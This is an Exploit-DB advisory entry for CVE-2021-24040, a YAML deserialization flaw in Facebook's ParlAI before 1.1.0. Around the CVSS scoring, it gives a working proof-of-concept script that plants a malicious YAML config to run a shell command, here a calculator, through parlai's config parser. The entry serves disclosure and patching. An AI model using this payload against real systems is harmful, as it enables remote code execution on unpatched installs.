Lucene search

K
exploitdbAbhiram VEDB-ID:50289
HistorySep 13, 2021 - 12:00 a.m.

Facebook ParlAI 1.0.0 - Deserialization of Untrusted Data in parlai

2021-09-1300:00:00
Abhiram V
www.exploit-db.com
189

9.8 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

9.8 High

AI Score

Confidence

High

7.5 High

CVSS2

Access Vector

NETWORK

Access Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:P/I:P/A:P

0.078 Low

EPSS

Percentile

94.1%

# Exploit Title: Facebook ParlAI 1.0.0 -  Deserialization of Untrusted Data in parlai
# Date: 2021-09-11
# Exploit Author: Abhiram V
# Vendor Homepage: https://parl.ai/
# Software Link: https://github.com/facebookresearch/ParlAI
# Version: < 1.1.0
# Tested on: Linux
# CVE: CVE-2021-24040
# References : 
# https://github.com/facebookresearch/ParlAI/security/advisories/GHSA-m87f-9fvv-2mgg
# | https://anon-artist.github.io/blogs/blog3.html |

############################################################################

Introduction
ParlAI (pronounced β€œpar-lay”) is a free, open-source python framework for
sharing, training and evaluating AI models on a variety of openly available
dialogue datasets.

############################################################################

Vulnerability details

############################################################################

Description
ParlAI was vulnerable to YAML deserialization attack caused by unsafe
loading which leads to Arbitrary Code Execution.

Proof of Concept

Create the following PoC file (exploit.py)

import os
#os.system('pip3 install parlai')
from parlai.chat_service.utils import config
exploit = """!!python/object/new:type
  args: ["z", !!python/tuple [], {"extend": !!python/name:exec }]
  listitems: "__import__('os').system('xcalc')"
"""
open('config.yml','w+').write(exploit)
config.parse_configuration_file('config.yml')

Execute the python script ie, python3 exploit.py

Impact
Code Execution

############################################################################

9.8 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

9.8 High

AI Score

Confidence

High

7.5 High

CVSS2

Access Vector

NETWORK

Access Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:P/I:P/A:P

0.078 Low

EPSS

Percentile

94.1%